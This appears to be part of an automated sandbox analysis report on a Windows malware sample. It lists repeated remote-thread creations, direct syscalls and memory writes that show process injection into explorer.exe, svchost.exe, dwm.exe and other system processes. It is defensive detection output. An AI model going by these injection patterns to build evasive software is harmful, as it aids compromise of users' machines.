        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe | Thread created: unknown EIP: A40000
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe | Thread created: unknown EIP: A50000
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe | Thread created: unknown EIP: 600000
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe | Thread created: unknown EIP: 610000
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe | Thread created: unknown EIP: 190000
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe | Thread created: unknown EIP: 1A0000
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe | Thread created: unknown EIP: 5A0000
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe | Thread created: unknown EIP: 5B0000
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe | Thread created: unknown EIP: E00000
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe | Thread created: unknown EIP: E10000
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeThread created: unknown EIP: 790000Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeThread created: unknown EIP: 7A0000Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeThread created: unknown EIP: 820000Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeThread created: unknown EIP: 830000Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeThread created: unknown EIP: F40000Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeThread created: unknown EIP: F50000Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeThread created: unknown EIP: F00000Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeThread created: unknown EIP: F50000Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeThread created: unknown EIP: A40000Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeThread created: unknown EIP: A50000Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeThread created: unknown EIP: 7A0000Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeThread created: unknown EIP: 7B0000Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeThread created: unknown EIP: 1140000Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeThread created: unknown EIP: 1150000Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeThread created: unknown EIP: BE0000Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeThread created: unknown EIP: BF0000Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeThread created: unknown EIP: 560000Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeThread created: unknown EIP: 570000Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeThread created: unknown EIP: 13F0000Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeThread created: unknown EIP: 1400000Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeThread created: unknown EIP: A10000Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeThread created: unknown EIP: A20000Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeThread created: unknown EIP: EE0000Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeThread created: unknown EIP: EF0000Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeThread created: unknown EIP: F00000Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeThread created: unknown EIP: F10000Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeThread created: unknown EIP: 1110000Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeThread created: unknown EIP: 1120000Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeThread created: unknown EIP: D00000Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeThread created: unknown EIP: D10000Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeThread created: unknown EIP: 3B0000Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeThread created: unknown EIP: 3C0000Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeThread created: unknown EIP: 930000Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeThread created: unknown EIP: 940000Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeThread created: unknown EIP: A40000Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeThread created: unknown EIP: A50000Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeThread created: unknown EIP: 9F0000Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeThread created: unknown EIP: A00000Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeThread created: unknown EIP: 780000Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeThread created: unknown EIP: 790000Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeThread created: unknown EIP: 7B0000Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeThread created: unknown EIP: 7C0000Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeThread created: unknown EIP: 780000Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeThread created: unknown EIP: 7D0000Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeThread created: unknown EIP: AC0000Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeThread created: unknown EIP: B10000Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeThread created: unknown EIP: 7D0000Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeThread created: unknown EIP: 820000Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeThread created: unknown EIP: 1550000Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeThread created: unknown EIP: 15A0000Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeThread created: unknown EIP: ED0000Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeThread created: unknown EIP: EE0000Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeThread created: unknown EIP: 11D0000Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeThread created: unknown EIP: 11E0000Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeThread created: unknown EIP: DA0000Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeThread created: unknown EIP: DB0000Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeThread created: unknown EIP: 1250000Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeThread created: unknown EIP: 1260000Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeThread created: unknown EIP: BC0000Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeThread created: unknown EIP: BD0000Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeThread created: unknown EIP: 1280000Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeThread created: unknown EIP: 12D0000Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeThread created: unknown EIP: 900000Jump to behavior
        Source: C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exe NtClose: Direct from: 0x77542B6C
        Source: C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exe NtSetInformationProcess: Direct from: 0x77542C5C
        Source: C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exe NtQueryInformationProcess: Direct from: 0x77542C26
        Source: C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exe NtDelayExecution: Direct from: 0x77542DDC
        Source: C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exe NtAllocateVirtualMemory: Direct from: 0x77542BFC
        Source: C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exe NtResumeThread: Direct from: 0x775436AC
        Source: C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exe NtCreateMutant: Direct from: 0x775435CC
        Source: C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exe NtSetInformationThread: Direct from: 0x775363F9
        Source: C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exe NtMapViewOfSection: Direct from: 0x77542D1C
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe Memory written: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe base: 400000 value starts with: 4D5A
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe Memory written: PID: 3504 base: B60000 value: E8
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Sector.30.15961.3704.exe Memory written: C:\Windows\System32\fontdrvhost.exe base: F10000
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Sector.30.15961.3704.exe Memory written: C:\Windows\System32\fontdrvhost.exe base: 190000
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Sector.30.15961.3704.exe Memory written: C:\Windows\System32\dwm.exe base: 660000
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe Memory written: C:\Windows\System32\fontdrvhost.exe base: F20000
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe Memory written: C:\Windows\System32\fontdrvhost.exe base: 1A0000
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe Memory written: C:\Windows\System32\dwm.exe base: 670000
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe Memory written: C:\Windows\System32\sihost.exe base: D20000
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe Memory written: C:\Windows\System32\svchost.exe base: 3F0000
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe Memory written: C:\Windows\System32\svchost.exe base: 8D0000
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe Memory written: C:\Windows\System32\ctfmon.exe base: 7F0000
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe Memory written: C:\Windows\explorer.exe base: B60000
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe Memory written: C:\Windows\System32\svchost.exe base: 2E0000
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe Memory written: C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe base: A30000
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 620000
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe Memory written: C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe base: 160000
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: A80000
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 980000
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe Memory written: C:\Windows\System32\smartscreen.exe base: 890000
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe Memory written: C:\Windows\System32\ApplicationFrameHost.exe base: F70000
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe Memory written: C:\Program Files\WindowsApps\Microsoft.WindowsStore_11910.1002.5.0_x64__8wekyb3d8bbwe\WinStore.App.exe base: 1A0000
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 9A0000
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe Memory written: C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe base: AA0000
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe Memory written: C:\Windows\System32\svchost.exe base: 210000
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe Memory written: C:\Windows\System32\conhost.exe base: 90000
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe Memory written: C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exe base: 7B0000
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe Memory written: C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exe base: 7C0000
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe Memory written: C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exe base: 12B0000
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe Memory written: C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exe base: 12C0000
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe Memory written: C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exe base: 790000
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe Memory written: C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exe base: 7A0000
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe Memory written: C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exe base: A20000
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe Memory written: C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exe base: A30000
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe Memory written: C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exe base: AD0000
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe Memory written: C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exe base: AE0000
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe Memory written: C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exe base: B90000
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe Memory written: C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exe base: BA0000
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe Memory written: C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exe base: 11D0000
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe Memory written: C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exe base: 11E0000
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe Memory written: C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exe base: 4E0000
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe Memory written: C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exe base: 4F0000
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe Memory written: C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exe base: 1040000
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe Memory written: C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exe base: 1050000
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe Memory written: C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exe base: 5D0000
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe Memory written: C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exe base: 5E0000
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe Memory written: C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exe base: 1350000
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe Memory written: C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exe base: 1360000
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe Memory written: C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exe base: 7C0000
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe Memory written: C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exe base: 7D0000
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe Memory written: C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exe base: A40000
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe Memory written: C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exe base: A50000
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe Memory written: C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exe base: 600000
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe Memory written: C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exe base: 610000
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe Memory written: C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exe base: 190000
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe Memory written: C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exe base: 1A0000
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe Memory written: C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exe base: 5A0000
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe Memory written: C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exe base: 5B0000
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe Memory written: C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exe base: E00000
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe Memory written: C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exe base: E10000
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe Memory written: C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exe base: 790000
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe Memory written: C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exe base: 7A0000
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe Memory written: C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exe base: 820000
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe Memory written: C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exe base: 830000
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe Memory written: C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exe base: F40000
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe Memory written: C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exe base: F50000
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe Memory written: C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exe base: F00000
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe Memory written: C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exe base: F50000
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe Memory written: C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exe base: A40000
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe Memory written: C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exe base: A50000
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe Memory written: C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exe base: 7A0000
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe Memory written: C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exe base: 7B0000
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe Memory written: C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exe base: 1140000
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe Memory written: C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exe base: 1150000
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe Memory written: C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exe base: BE0000
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe Memory written: C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exe base: BF0000
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe Memory written: C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exe base: 560000
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe Memory written: C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exe base: 570000
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe Memory written: C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exe base: 13F0000
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe Memory written: C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exe base: 1400000
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe Memory written: C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exe base: A10000
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe Memory written: C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exe base: A20000
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe Memory written: C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exe base: EE0000
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe Memory written: C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exe base: EF0000
